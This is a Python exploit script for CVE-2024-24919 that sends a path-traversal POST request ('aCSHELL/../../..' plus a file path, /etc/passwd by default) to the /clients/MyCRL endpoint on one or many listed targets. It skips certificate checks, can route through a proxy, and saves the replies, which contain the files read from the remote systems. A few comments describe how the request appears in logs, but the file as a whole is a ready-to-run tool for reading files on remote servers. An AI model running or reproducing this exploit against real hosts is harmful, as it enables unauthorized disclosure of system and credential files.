import argparse
from requests import post, RequestException
import urllib3
# send_request() posts with verify=False, so the server certificate is never checked and
# urllib3 would emit an InsecureRequestWarning for each request. Silence that one warning
# category only; this hides the warning, it does not make the connection verified.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
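def banner():
    """Return the multi-line ASCII-art banner shown at startup.

    The art is kept in a raw string so every backslash is taken literally.
    In a normal string literal the backslashes followed by a space, a pipe
    or an underscore are invalid escape sequences, which recent Python
    versions warn about at compile time. The returned text is unchanged:
    it starts and ends with a newline.
    """
    return r"""
_ __ _
| |/ / | |
| ' / __ _ | | __ _ __ __ _ _
| < / _` || | / _` |\ \ /\ / /| | | |
| . \| (_| || || (_| | \ V V / | |_| |
|_|\_\__,_||_| \__,_| \_/\_/ \__, |
__/ |
|___/
"""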
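# The banner is printed and the command line parsed at module level, so both also
# happen when this file is imported rather than run.
print(banner())

parser = argparse.ArgumentParser(
    description="This is an exploit for CVE-2024-24919",
    usage=argparse.SUPPRESS,
)
parser.add_argument("-d", "--target", type=str, help="A target to be tested")
parser.add_argument("-l", "--list", type=str, help="List of targets to be tested")
parser.add_argument(
    "-f",
    "--file",
    type=str,
    default="/etc/passwd",
    help="Specify a file to exploit (default: /etc/passwd)",
)
parser.add_argument("-proxy", "--proxy", type=str, help="Proxy to use for requests")
# The help text used to name /etc/passwd as the default; the default is ./output.txt.
parser.add_argument(
    "-o",
    "--output",
    type=str,
    default="./output.txt",
    help="Filename to save the output (default: ./output.txt)",
)
# Without type=int, "-v 0" arrives as the string "0", which is truthy, so verbose
# output could never be switched off from the command line.
parser.add_argument(
    "-v",
    "--verbose",
    type=int,
    choices=(0, 1),
    default=1,
    help="Show progress; expects 1 or 0 (default: 1)",
)
args = parser.parse_args()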
def send_request(target, file, proxy):
    """POST the CVE-2024-24919 request body to one host and return the reply text.

    Args:
        target: Host (optionally with port) placed after ``https://`` in the URL.
        file: Path appended to the traversal prefix in the request body.
        proxy: ``proxies`` mapping passed to requests, or None for a direct connection.

    Returns:
        The response body as text, returned without looking at the HTTP status,
        or the string "Failed to connect to <target>" when requests raises
        RequestException. Both outcomes are plain strings, so the caller cannot
        tell them apart by type.
    """
    # What this looks like in gateway or proxy logs: a POST to /clients/MyCRL whose
    # body starts with "aCSHELL/" followed by "../" segments, sent with the fixed
    # User-Agent below.
    request_headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
    }
    url = f"https://{target}/clients/MyCRL"
    body = f"aCSHELL/../../../../../../..{file}"
    try:
        # verify=False: the server certificate is not validated for this request.
        reply = post(
            url,
            data=body,
            headers=request_headers,
            verify=False,
            proxies=proxy,
        )
        return reply.text
    except RequestException:
        return f"Failed to connect to {target}"
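def main():
    """Send the request to every target given with -d / -l and record each reply.

    Reads the module-level ``args`` and ``parser`` and calls ``send_request``
    once per target. Targets come from ``--target`` and, one per non-blank
    line, from the file named by ``--list``. Each reply is appended to the
    ``--output`` file when one is set, otherwise printed.

    Raises:
        SystemExit: when neither ``--target`` nor ``--list`` was supplied.
    """
    # At least one of -d / -l is required.
    if not args.list and not args.target:
        # print_help() writes the help text itself and returns None; wrapping it
        # in print() added a stray "None" line to the output.
        parser.print_help()
        print("-d or -l should be given")
        # Same effect as the site-provided exit(), without depending on the site module.
        raise SystemExit

    proxy = {"http": args.proxy, "https": args.proxy} if args.proxy else None

    targets = [args.target] if args.target else []
    if args.list:
        with open(args.list) as target_file:
            targets.extend(line.strip() for line in target_file if line.strip())

    for target in targets:
        result = send_request(target, args.file, proxy)
        if args.verbose:
            print(f"Testing {target}")
            print(result)
        if args.output:
            # Replies are appended as received and may hold the contents of the
            # requested file; the output file is created with default permissions,
            # so it should be stored and cleaned up as sensitive data.
            with open(args.output, "a") as output_file:
                output_file.write(f"Target: {target}\n\n")
                output_file.write(result)
                output_file.write("\n\n")
        else:
            # The reply is already part of this line, so it is not printed a second time.
            print(f"Target: {target}\n{result}\n\n")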
if __name__ == "__main__":
    # Script entry point: Ctrl-C during a run ends the program with a short
    # message instead of a KeyboardInterrupt traceback.
    try:
        main()
    except KeyboardInterrupt:
        print("exit")
        raise SystemExit from None